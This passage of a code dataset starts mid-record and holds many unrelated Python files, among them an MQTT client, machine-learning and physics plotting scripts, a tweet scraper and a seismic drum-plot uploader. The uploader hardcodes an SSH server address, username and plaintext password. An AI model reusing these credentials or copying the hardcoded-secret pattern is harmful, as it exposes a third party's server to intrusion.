msg.payload.decode(\"utf-8\"),\n 'aikaleima': strftime(\"%m/%d/%Y %H:%M\")},callback=insert_callback)\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\n\n\nclient.connect(\"10.10.206.157\", 1883, 60)\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\n\nclient.loop_forever()\n\n\n\n","sub_path":"SääasemaPython.py","file_name":"SääasemaPython.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"648428687","text":"#testing1\r\n#MACHINE LEARNING: es una serie de algoritmos que hacen que tu dispositivos o aplicacion tengan inteligencia\r\n#Tensor flow: redes neuronales\r\n#sklearn: logical core de machine learning\r\n\r\n#Linear Regression\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.datasets import load_boston\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression, Ridge\r\n\r\nboston = load_boston()\r\n\r\nprint(str(boston.keys()),end=\"\\n\\n\")\r\n\r\n#print(boston.data)\r\nprint(boston.target.shape)\r\n\r\nX_ent, X_test,y_ent, y_test = train_test_split(boston.data,boston.target)\r\nprint(\"ready...\")\r\nprint(y_test.shape)\r\n\r\nknn = KNeighborsRegressor(n_neighbors=3)\r\n\r\nknn.fit(X_ent,y_ent)\r\n\r\nprint(knn.score(X_test,y_test))\r\n\r\ninput()\r\n","sub_path":"teting1.py","file_name":"teting1.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"61099016","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 20 15:08:36 2017\n\n@author: Seán Brennan\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n#------------------------------------------------------------------------------\n\nmass_sun = 1.989e30\nmass_earth = 5.672e24\nradius_sun = 695700000\nradius_earth = 6371e3\nmass_ISS = 419455\ng = 6.673e-11\nAU = 15.0e10\nT = 5778\nsig = 5.67e-8\nc = 3e8\n#------------------------------------------------------------------------------\n\"\"\"check using data from ISS:\n> r is 400km\n> vel(r) is 7.66km/s\n> period(r) is 94 mins\n\"\"\"\ndef vel(r):\n return np.sqrt(g*mass_sun*(1/(r+radius_sun)))\ndef acc(r):\n return g*mass_sun*(1/(r+radius_sun)**2)\ndef period(r):\n return 2*np.pi*np.sqrt(r**3/(g*mass_sun))\nsec_to_year=1/(60*60*24*365)\ndef f_grav(r):\n return (g*mass_sun*mass_ISS)/r**2 \ndef flux(r):\n L = 4*np.pi*(radius_sun**2)*sig*T**4\n F = L / (4*np.pi*r**2)\n return F\ndef lor(v): #lorrentz factor\n return np.sqrt(1-(v)**2/(c)**2)\n \n#------------------------------------------------------------------------------\ndef dist(x,y): # defining pythagorus therom for distance\n return (x**2 + y**2)**0.5\n#------------------------------------------------------------------------------\nfig1=plt.figure('Obitial Velocity v.s. Distance ')\ntest_r = np.linspace(10*radius_sun,300*radius_sun,100)\nplt.scatter(test_r/radius_sun,vel(test_r))\n\nplt.title('Distance v.s. Orbital Velcoity')\nplt.xlabel('Distance from stellar surface [R0]')\nplt.ylabel('Orbital Velocity [m/s]')\nplt.axvline((AU/radius_sun),color='k', linestyle='--')\nplt.axhline(vel(AU),color='k', linestyle='--')\n#------------------------------------------------------------------------------\nfig2=plt.figure('Period v.s. Distance')\ntest_r = np.linspace(10*radius_sun,300*radius_sun,100)\nplt.scatter((test_r)/radius_sun,period(test_r)*sec_to_year)\nplt.title('Period v.s. Distance')\nplt.xlabel('Distance from stellar surface [R0]')\nplt.ylabel('Period [yrs]')\nplt.axvline((AU/radius_sun),color='k', linestyle='--')\nplt.axhline(period(AU)*sec_to_year,color='k', linestyle='--')\n#------------------------------------------------------------------------------\nfig3=plt.figure('Force v.s. Distance')\ntest_r = np.linspace(10*radius_sun,300*radius_sun,100)\nplt.scatter((test_r)/radius_sun,f_grav(test_r))\nplt.title('Force v.s. Distance')\nplt.xlabel('Distance from stellar surface [R0]')\nplt.ylabel('Force [N]')\nplt.axvline((AU/radius_sun),color='k', linestyle='--')\nplt.axhline(f_grav(AU),color='k', linestyle='--')\n#------------------------------------------------------------------------------\nfig4=plt.figure('Luminousity v.s. Distance')\ntest_r = np.linspace(10*radius_sun,300*radius_sun,100)\nplt.scatter((test_r)/radius_sun,flux(test_r))\nplt.scatter((test_r)/radius_sun,(0.46*flux(test_r)),color='r')\nplt.text(200,550000,'Efficeny of 46%',color='b') # <- https://www.google.ie/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=most%20efficent%20solar%20panels\nplt.text(200,500000,'Total Luminousity',color='r')\nplt.title('Luminousity v.s. Distance')\nplt.xlabel('Distance from stellar surface [R0]')\nplt.ylabel('Luminousity [J/s]')\nplt.axvline((AU/radius_sun),color='k', linestyle='--')\nplt.axhline(flux(AU),color='k', linestyle='--')\n\n","sub_path":"Dyson_sphere_data.py","file_name":"Dyson_sphere_data.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"400510527","text":"import numpy as np\n\n\ndef line2d_seg_dist(p1, p2, p0):\n \"\"\"distance(s) from line defined by p1 - p2 to point(s) p0\n\n p0[0] = x(s)\n p0[1] = y(s)\n\n intersection point p = p1 + u*(p2-p1)\n and intersection point lies within segment if u is between 0 and 1\n\n from matplotlib < 3.1\n \"\"\"\n\n x21 = p2[0] - p1[0]\n y21 = p2[1] - p1[1]\n x01 = np.asarray(p0[0]) - p1[0]\n y01 = np.asarray(p0[1]) - p1[1]\n\n u = (x01*x21 + y01*y21) / (x21**2 + y21**2)\n u = np.clip(u, 0, 1)\n d = np.hypot(x01 - u*x21, y01 - u*y21)\n\n return d\n\n","sub_path":"code/plotting_utils.py","file_name":"plotting_utils.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"426507112","text":"# -*- coding: utf-8 -*-\n\"\"\"\nMath 6702 Homework 3 Problem 9.6.8\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib as mpl\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\n\n# For drawing vector on 3D plot\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n #\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))\n FancyArrowPatch.draw(self, renderer)\n #\n#\n\n# Create spatial variables\nnPoints = 1000;\nx_1d = np.linspace(0.2, 2.9, nPoints);\ny_1d = np.linspace(0, 5, nPoints);\nx, y = np.meshgrid(x_1d, y_1d);\n\n# Create scalar field\nz = (y - 1)/np.sin(x);\n\n# Compute level curve value\nx0 = np.pi/6;\ny0 = 3/2;\nc = (y0 - 1)/np.sin(x0);\n\n# Set up figure\nfig = plt.figure(facecolor='white');\nax = fig.gca(projection='3d')\n\ntol = 0.0005;\nlevels = [ c - tol, c + tol ];\n\nmaxValue = 2;\n\nsurfacePlotHandle = ax.plot_surface(x, y, z, \\\n cmap='viridis', linewidth=0, antialiased=False );\n \n# Add in gradient vector\nx0 = np.pi/6;\ny0 = 3/2;\nz0 = 1;\nx1 = x0 + np.sqrt(3);\ny1 = y0 + 2;\nz1 = z0;\na = Arrow3D([x0, x1], [y0, y1], [z0, z1], mutation_scale=20, \n lw=3, arrowstyle=\"-|>\", color=\"k\")\nax.add_artist(a)\n\nax.text( x1 - 1.5, y1-1, z1, r'$\\nabla f$', None, fontsize=20 );\n\n# Plot level curve in x-y plane\nxLong = np.linspace(0, 3.5, 1000);\nlinePlotHandle = ax.plot( xLong, np.sin(xLong) + 1, 'k' );\n\nplt.ylim([0, 5]);\nplt.ylabel(r'$y$',fontsize=26, family='serif',labelpad=20);\nplt.yticks( fontsize=14, family='serif' );\n\nplt.xlim([0, np.pi]);\nplt.xlabel(r'$x$',fontsize=26, family='serif',labelpad=20);\nplt.xticks( [0, np.pi/4, np.pi/2, 3*np.pi/4, np.pi], \\\n [r'0', r'$\\pi/4$', r'$\\pi/2$', r'$3\\pi/4$', '$\\pi$'], \\\n fontsize=19, family='serif' );\n\nax.set_zlabel(r'$z$',fontsize=26, family='serif',labelpad=20);\n\nplt.show()\n","sub_path":"math6702/hw3/problem9.6.8.py","file_name":"problem9.6.8.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"207717141","text":"class Solution:\n def minDepth(self, root: TreeNode) -> int:\n \n def getChild(root: TreeNode) -> list:\n \tchild = []\n \tif root.left:\n \t\tchild.append(root.left)\n \tif root.right:\n \t\tchild.append(root.right)\n \treturn child\n\n if not root:\n return 0\n NodesInSameLevel = [root]\n\n level=0\n\n while NodesInSameLevel!=[]:\n \tlevel+=1\n \tfor i in range(len(NodesInSameLevel)-1, -1, -1):\n\t \tcurNode = NodesInSameLevel.pop(i)\n\t \tchild = getChild(curNode)\n\t \tif child == []:\n\t \t\treturn level\n\t \tNodesInSameLevel.extend(child)\n\n\t \n\n# Runtime: 48 ms, faster than 88.06% of Python3 online submissions for Minimum Depth of Binary Tree.\n# Memory Usage: 15.1 MB, less than 62.16% of Python3 online submissions for Minimum Depth of Binary Tree.","sub_path":"ALGO/111_Minimum_Depth_of_Binary_Tree.py","file_name":"111_Minimum_Depth_of_Binary_Tree.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"34622791","text":"# -*- coding: utf-8 -*-\nfrom salver.facts import Tweet, Username\nfrom salver.common.utils import get_actual_dir\nfrom salver.common.collectors import DockerCollector\n\n\nclass Twint(DockerCollector):\n config = {\n 'name': 'twint',\n 'docker': {'build_context': get_actual_dir()},\n }\n\n def callbacks(self):\n return {Username: self.scan}\n\n def scan(self, username):\n regex = r'(\\d+) (\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2}).*<.*> (.*)'\n\n data = self.run_container(command=['-u', username.name, '--retweets'])\n for tweet_id, date, content in self.findall_regex(data, regex):\n yield Tweet(id=tweet_id, content=content, date=date, rt=True)\n\n data = self.run_container(command=['-u', username.name])\n for tweet_id, date, content in self.findall_regex(data, regex):\n yield Tweet(id=tweet_id, content=content, date=date, rt=False)\n","sub_path":"salver/agent/collectors/twint/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"483848631","text":"def hello(name):\n\t'''\n\tReturns a greeting to the user\n\n\tIf no name is passed, let user know there's an issue\n\t'''\n\tif not name:\n\t\traise ValueError(\"Well, we didn't want to talk to you anyway!\")\n\n\treturn \"Hello, {}!\".format(name)\n\nif __name__ == \"__main__\":\n\tname = input(\"Enter your name: \")\n\tprint(hello(name))","sub_path":"01 Saying Hello/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"504835746","text":"import numpy as np\n\ndat = np.loadtxt('USA_girls_trimmed.dat', dtype=[('day','int'),('month','S10'),('year', 'int')])\n\nmonths=['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\nmo_num = np.arange(12)\n\nmo_dist = dat['day']*0-666\n\nfor i in np.arange(np.size(months)):\n good = np.where(dat['month'] == months[i])\n mo_dist[good] = mo_dist[good]*0+i\n\nhist(mo_dist, bins=12)\n","sub_path":"blargh/Code/Age_effects/Tennis/ql.py","file_name":"ql.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"121854512","text":"from observal import *\nfrom clientcomm_v1 import *\nfrom readgeneral_v2 import *\nfrom readgeneral_v2 import *\nfrom writegeneral_v2 import *\n\nclass AreaObserver:\n def __init__(self, observable):\n observable.register_observer(self)\n\n def notify(self, *args, **kwargs):\n for item in args[0]:\n item.analogprocess()\n\nclass analogprocess:\n\n def __init__(self,alldevices,filename):\n self.subject = Observable()\n self.observer = AreaObserver(self.subject)\n self.alldevices = alldevices\n self.client = Communication()\n self.sta_con_plc = self.client.opc_client_connect(filename)\n self.observer = AreaObserver(self.subject)\n self.readgeneral = ReadGeneral(self.sta_con_plc)\n\n\n def process(self):\n\n for item in range(len(self.alldevices.allanalogsignalobjects.listofanalogobjects)):\n self.alldevices.allanalogsignalobjects.listofanalogobjects[item].analogprocess()\n\n\ndef readkeyandvalues(alldevice):\n analogdictionary = alldevice.allanalogs.dictionary\n areas = list(analogdictionary.keys())\n\n n = 0\n while n < len(areas):\n area = areas[n]\n devices = analogdictionary[area]\n yield area, devices\n n = n + 1\n\n\n\n\n\n\n\n\n\n","sub_path":"RH2/RH2/allanalogprocessing.py","file_name":"allanalogprocessing.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"490819280","text":"import numpy as np\nimport cv2\n\nif __name__ == '__main__':\n # http://www.opencv.org.cn/opencvdoc/2.3.2/html/doc/tutorials/imgproc/erosion_dilatation/erosion_dilatation.html\n\n img = cv2.imread(\n '/Users/zezzhang/Workspace/img2tags_serving/image_prediction/data/A/train/image/id_00000001_856.jpg'\n )\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n # initialize OpenCV's static fine grained saliency detector and\n # compute the saliency map\n saliency = cv2.saliency.StaticSaliencyFineGrained_create()\n (success, saliencyMap) = saliency.computeSaliency(gray)\n saliencyMap = (saliencyMap * 255).astype(\"uint8\")\n\n cv2.imshow('saliencyMap', saliencyMap)\n\n blur = cv2.GaussianBlur(saliencyMap, (5, 5), 0)\n cv2.imshow('blur', blur)\n\n # noise removal\n kernel = np.ones((3, 3), np.uint8)\n opening = cv2.morphologyEx(blur, cv2.MORPH_OPEN, kernel, iterations=2) # 形态开运算\n cv2.imshow('opening', opening)\n\n # sure background area\n sure_bg = cv2.dilate(opening, kernel, iterations=3)\n cv2.imshow('sure_bg', sure_bg)\n\n # Finding sure foreground area\n dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\n _, sure_fg = cv2.threshold(dist_transform, 0.7 * dist_transform.max(), 255, cv2.THRESH_BINARY)\n\n cv2.imshow('sure_fg', sure_fg)\n\n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv2.subtract(sure_bg, sure_fg)\n\n # Marker labelling\n _, markers = cv2.connectedComponents(sure_fg)\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers + 1\n # Now, mark the region of unknown with zero\n markers[unknown == 255] = 0\n\n markers = cv2.watershed(img, markers)\n img[markers <= 1] = [255, 255, 255]\n\n cv2.imshow('img', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","sub_path":"image_prediction/color/learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"131491266","text":"import sqlite3 as sq\nimport html\n\ndef createTagTable():\n '''\n 创建标签表\n '''\n db = sq.connect('./jokes.db')\n try:\n db.execute('create table tagTab (tag varchar(20) primary key, backup varchar(20) null)')\n # 除了标签名之外, 还有一个备用的column\n except:\n # 如果数据库中已有该表, 则直接退出\n db.rollback()\n return\n db.commit()\n \ndef createJokeTable():\n '''\n 创建笑话表\n '''\n db = sq.connect('./jokes.db')\n try:\n # 包括序号, 标题, 内容\n db.execute('create table jokeTab (jokeNo integer, title varchar(20) null, content varchar(20), primary key(jokeNo))')\n except:\n # 如果数据库中已有该表, 则直接退出\n db.rollback()\n return\n db.commit()\n\ndef createJokeTagTable():\n '''\n 创建笑话和标签的关联表格\n '''\n db = sq.connect('./jokes.db')\n try:\n # 包括笑话序号和标签名\n db.execute('create table jokeTagTab (jokeNo integer, tag varchar(20), primary key (jokeNo, tag), foreign key(jokeNo) references jokeTab(jokeNo), foreign key(tag) references tagTab(tag))')\n except:\n # 如果数据库中已有该表, 则直接退出\n db.rollback()\n return\n db.commit()\n\ndef createDB():\n '''\n 数据库创建\n '''\n createTagTable()\n createJokeTable()\n createJokeTagTable()\n\n\ndef readFile_dsk(fileName):\n '''\n 从杜世康学长哪里拷来的数据处理\n '''\n db = sq.connect('./jokes.db')\n # 确定当前已存储的笑话数, 以便确定初始序号\n cu = db.cursor()\n cu.execute('select count(jokeNo) from jokeTab')\n jokeCount = cu.fetchone()[0]\n fileIn = open(fileName, 'r', encoding = 'utf-16')\n while True:\n line = fileIn.readline()\n # 文件结尾退出\n if len(line) == 0:\n break\n \n # 把制表符转换为空格\n line = line.replace('\\t', ' ')\n # 消去行中的html标签\n line = line.replace('', '')\n line = line.replace('
', '')\n # 转换行中的html entity\n line = html.unescape(line)\n # 居然还有全角空格\n line = line.replace('\\u3000', '')\n # 把单引号换成sql中的转移单引号\n line = line.replace('\\'', '\\'\\'')\n splitStrBySpace = line.split(' ')\n if '\\\\' in line:\n # 出现了奇怪的东西, 因为这些东西不多, 所以直接抛弃掉这些数据就好\n # 抛弃掉的时候要收集数据, 可以把输出重定向到一个文件\n print('detected \\\\ in the line:')\n print(line)\n continue\n \n # 从行中读取笑话标题, 标签等数据\n title = splitStrBySpace[1]\n tag = splitStrBySpace[-1]\n content = ''\n for word in splitStrBySpace[2:-1]:\n content += word\n \n # 检查标签是不是被添加过了\n cu.execute('select tag from tagTab where tag = \\'%s\\'' %tag)\n result = cu.fetchall()\n if len(result) != 1:\n # 插入标签数据\n try:\n db.execute('insert into tagTab values (\\'%s\\', %d)' %(tag, 0))\n except:\n # 如果出现意外, 忽略错误, 执行回滚, 抛弃这组数据同时把错误数据输出\n db.rollback()\n print ('db exception')\n print (line)\n continue\n try:\n # 插入笑话内容和关联数据\n db.execute('insert into jokeTab values (%d, \\'%s\\', \\'%s\\' )' %(jokeCount, title, content))\n db.execute('insert into jokeTagTab values (%d, \\'%s\\')' % (jokeCount, tag))\n except:\n # 如果出现意外, 忽略错误, 执行回滚, 抛弃这组数据同时把错误数据输出\n db.rollback()\n print ('db exception')\n print (line)\n continue\n db.commit()\n jokeCount += 1\n fileIn.close()\n\ndef readFile_yyj(fileName):\n '''\n 从叶亚杰学长哪里拷来的数据处理\n '''\n db = sq.connect('./jokes.db')\n # 确定当前已存储的笑话数, 以便确定初始序号\n cu = db.cursor()\n cu.execute('select count(jokeNo) from jokeTab')\n jokeCount = cu.fetchone()[0]\n fileIn = open(fileName, 'r')\n\n while True:\n line = fileIn.readline()\n # 文件结尾退出\n if len(line) == 0:\n break\n # 空行直接跳过\n elif len(line) == 1:\n continue\n # 网址行, 直接跳过\n elif 'http' in line:\n continue\n\n content = line\n content = content.replace('\\'', '\\'\\'')\n content = content.replace('\\\\', '')\n tagLine = fileIn.readline()\n\n try:\n db.execute('insert into jokeTab values (%d, \\'%s\\', \\'%s\\')' % (jokeCount, '', content))\n except:\n # 如果出现意外, 忽略错误, 执行回滚, 抛弃这组数据同时把错误数据输出\n print('db exception while adding content:')\n print (content)\n continue\n\n if(len(tagLine) < 5):\n # 我没有查看所有数据, 不过标签太短肯定有问题, 所以直接报错\n print('tag line is too short:')\n print (content)\n print (tagLine)\n db.rollback()\n continue\n \n tags = tagLine.split(' ')\n \n for tag in tags[1:]:\n # 检查标签是不是已经在表中\n cu.execute('select tag from tagTab where tag = \\'%s\\'' %tag)\n result = cu.fetchall()\n if len(result) != 1:\n try:\n # 插入标签和关联数据\n db.execute('insert into tagTab values (\\'%s\\', %d)' %(tag, 0))\n db.execute('insert into jokeTagTab values (%d, \\'%s\\')' % (jokeCount, tag))\n except:\n # 如果出现意外, 忽略错误, 执行回滚, 抛弃这组数据同时把错误数据输出\n db.rollback()\n print ('db exception while adding tag:')\n print (tag)\n break\n else:\n db.commit()\n jokeCount += 1\n fileIn.close()\n\ncreateDB()\nreadFile_dsk('dskData')\n ","sub_path":"dataClarity/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"298657577","text":"\n\n#sudo ./slarchive -v -SDS /mnt/ide/seed/ -x statefile -S LK_BRK?:EH? 172.16.8.10:18000\n\n#openvpn --config clientBRASKEM__GEOAPP.con\n#\n# #sudo sshfs -o allow_other braskem@80.211.98.179:/uploads /mnt/geoAppServer/\nimport os\nfrom obspy import UTCDateTime\nfrom obspy.clients.seedlink.easyseedlink import EasySeedLinkClient\nfrom obspy.core.stream import Stream\nfrom obspy import read\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nfrom obspy import read_inventory\n\nfrom threading import Thread\n\nimport json\n\nimport time\nimport paramiko\n\n\ndpi = 100\nsizex = 800\nsizey = 600\nyRange = 0.1\n\nhystType = [1440, 360, 180, 60]\n\nband = {\n 'low': [1, 20],\n 'high': [20, 50]\n}\n\nrTWindow = 360\nrtSft = 2\n\n#inv = read_inventory(\"metadata/Braskem_metadata.xml\")\n\n\n\n\nclass drumPlot(EasySeedLinkClient):\n _traces =Stream()\n _inv = read_inventory(\"metadata/Braskem_metadata.xml\")\n _rtSft = rtSft\n _lastData = UTCDateTime.now()\n _traces = Stream()\n _appTrace = Stream()\n _drTrace =Stream()\n _drHTrace = Stream()\n _rTWindow = rTWindow\n _tEnd=UTCDateTime.now()\n _tNow = UTCDateTime.now()\n _rtRunning=False\n _hyRunning=False\n _saving=False\n _status={}\n\n def statusCalc(self):\n for tr in self._traces:\n id=tr.get_id()\n l=int(UTCDateTime.now()-tr.stats['endtime'])\n station=id.split('.')[1]\n self._status[station]={}\n self._status[station][\"Noise Level\"]=\"---\"\n self._status[station][\"Latency\"]= str(l)+'s'\n self._status[station][\"Voltage\"]=\"---\"\n self._status[station][\"Color\"]= \"#FF0000\"\n with open('geophone_network_status.json', 'w') as fp:\n json.dump(self._status, fp)\n sftp.put('geophone_network_status.json', 'uploads/RT/' + 'geophone_network_status.json')\n\n def singleStatusCalc(self,tr):\n id = tr.get_id()\n station = id.split('.')[1]\n l = int(UTCDateTime.now() - tr.stats['endtime'])\n self._status[station] = {}\n self._status[station][\"Noise Level\"] = \"---\"\n self._status[station][\"Latency\"] = str(l) + 's'\n self._status[station][\"Voltage\"] = \"---\"\n self._status[station][\"Color\"] = \"#FF0000\"\n\n def plotDrum(self, trace,filename='tmp.png'):\n #trace.resample(50)\n try:\n #self._appTrace.data = self._appTrace.data * 1000#/3.650539e+08\n trace.data=trace.data*1000\n im = trace.plot(type='dayplot',\n dpi=dpi,\n x_labels_size=int(8 * 100 / int(dpi)),\n y_labels_size=int(8 * 100 / int(dpi)),\n title_size=int(1000 / int(dpi)),\n title=self._tEnd.strftime(\"%Y/%m/%d\"),\n size=(sizex, sizey),\n color=('#AF0000', '#00AF00', '#0000AF'),\n # right_vertical_labels=True,\n\n vertical_scaling_range=yRange,\n # transparent=True,\n handle=True,\n time_offset=-3,\n data_unit='mm/s'\n # bgcolor='black',\n # grid_color='white',\n # face_color='black',+\n # show_y_UTC_label=False,\n # outfile='tmp.png'\n )\n im.savefig(filename)\n plt.close(im)\n\n return True\n except:\n print('ops,something wrong in plotting!!')\n return False\n\n def realTimeDrumPlot(self):\n print('start ' + UTCDateTime.now().strftime(\"%Y%m%d %H%M%S\"))\n appTrace=Stream()\n self._rtRunning=True\n for tr in self._traces:\n id = tr.get_id()\n spl = id.split('.')\n network = spl[0]\n station = spl[1]\n channel = spl[3]\n l = int(self._tEnd - tr.stats['endtime'])\n self._status[station] = {}\n self._status[station][\"Noise Level\"] = \"---\"\n self._status[station][\"Latency\"] = str(l) + 's'\n self._status[station][\"Voltage\"] = \"---\"\n self._status[station][\"Color\"] = \"#FF0000\"\n\n for b in band:\n fileNameRT = 'RT_' + network 
+ '_' + station + '_' + channel + '_' + str(b) + '.png'\n appTrace = tr.copy()\n bb = band[b]\n appTrace.trim(self._tEnd - self._rTWindow * 60, self._tEnd,pad=True,fill_value=0)\n appTrace.filter('bandpass', freqmin=bb[0], freqmax=bb[1], corners=2, zerophase=True)\n if self.plotDrum(appTrace):\n sftpMkdirs(sftp, '/RT/', 'uploads')\n sftp.put('tmp.png', 'uploads/RT/' + fileNameRT)\n #print(fileNameRT)\n with open('geophone_network_status.json', 'w') as fp:\n json.dump(self._status, fp)\n sftp.put('geophone_network_status.json', 'uploads/RT/' + 'geophone_network_status.json')\n print('end '+UTCDateTime.now().strftime(\"%Y%m%d %H%M%S\"))\n self._rtRunning=False\n\n def hystDrumPlot(self):\n print('Hyststart ' + UTCDateTime.now().strftime(\"%Y%m%d %H%M%S\"))\n appTrace=Stream()\n self._hyRunning=True\n\n for tr in self._traces:\n id = tr.get_id()\n #print('hyst '+id)\n spl = id.split('.')\n network = spl[0]\n station = spl[1]\n channel = spl[3]\n\n\n for h in hystType:\n\n if self._tEnd.hour % int(h / 60) == 0:\n for b in band:\n tStart = self._tEnd - h * 60\n p = network + '/' + station + '/' + channel + '/' + str(self._tEnd.year) + '/' + str(\n self._tEnd.month) + '/' + str(\n self._tEnd.day) + '/' + str(h) + '/' + str(b)\n\n fileName = p + '/' + tStart.strftime(\"%Y%m%d%H%M\") + '_' + self._tEnd.strftime(\n \"%Y%m%d%H%M\") + '.png'\n\n appTrace = tr.copy()\n bb = band[b]\n appTrace.trim(tStart, self._tEnd,pad=True,fill_value=0)\n appTrace.filter('bandpass', freqmin=bb[0], freqmax=bb[1], corners=2, zerophase=True)\n if self.plotDrum(appTrace,'tmpH.png'):\n sftpMkdirs(sftp, p, 'uploads')\n sftp.put('tmpH.png', 'uploads/' + fileName)\n #print(fileName)\n print('Hystend ' + UTCDateTime.now().strftime(\"%Y%m%d %H%M%S\"))\n self._hyRunning=False\n\n def align(self):\n if os.path.exists('traces.mseed'):\n self._traces = read('traces.mseed')\n return True\n\n def save(self):\n self._saving=True\n tr=self._traces.copy()\n print('saving')\n tr.write('traces.mseed')\n print('saved')\n self._saving=False\n\n def on_data(self,traces):\n self._tNow = UTCDateTime.now()\n traces.remove_response(self._inv)\n #traces.resample(125)\n self._traces += traces\n self._traces.merge(fill_value=0)\n\n # print(self._tNow.strftime((\"%Y-%m-%d %H:%M:%S\")) +' rtThread'+str(self._rtRunning))\n\n\n if (self._tNow.minute % self._rtSft == 0) & (self._lastData.minute % self._rtSft != 0):\n self._tEnd=self._tNow\n self._traces.trim(self._tEnd - 720 * 60, self._tNow)\n print(self._traces)\n if not self._rtRunning:\n rtThread = Thread(target=self.realTimeDrumPlot)\n rtThread.start()\n if not self._saving:\n sThread=Thread(target=self.save)\n sThread.start()\n\n if (self._tEnd.minute == 0) & (self._lastData.minute != 0):\n self._tEnd = self._tNow\n if not self._hyRunning:\n hyThread = Thread(target=self.hystDrumPlot)\n hyThread.start()\n # # self.hystDrumPlot()\n\n self._lastData = self._tNow\n\n\ndef sftpExist(p, path):\n try:\n p.stat(path)\n return True\n\n except IOError:\n return False\n\n\ndef sftpMkdirs(p, path, basePath):\n dirs = path.split('/')\n parPath = basePath\n for dir in dirs:\n parPath += '/' + dir\n if not sftpExist(p, parPath):\n p.mkdir(parPath)\n\n\n\nssh_client = paramiko.SSHClient()\nssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nssh_client.connect(hostname='80.211.98.179', username='braskem', password='Geoapp2020!',timeout=5)\nsftp = ssh_client.open_sftp()\nclient = drumPlot('172.16.8.10')\nclient.select_stream('LK', 'BRK?', 
'E??')\nclient.align()\nclient.run()\n","sub_path":"drumPlotHyst_1.2.py","file_name":"drumPlotHyst_1.2.py","file_ext":"py","file_size_in_byte":8986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"598541281","text":"from collections import defaultdict\nclass Solution(object):\n def subarraysDivByK(self, A, K):\n if len(A) == 1:\n if not A[0] % K: return 1\n else: return 0\n hashmap = {}\n hashmap[0] = 1\n value = 0\n res = 0\n for i in range(len(A)):\n value += A[i]\n key = value % K\n if key in hashmap:\n res += hashmap[key]\n hashmap[key] = hashmap.get(key,0) + 1\n return res\n\n","sub_path":"TestEveryday/lc974.py","file_name":"lc974.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
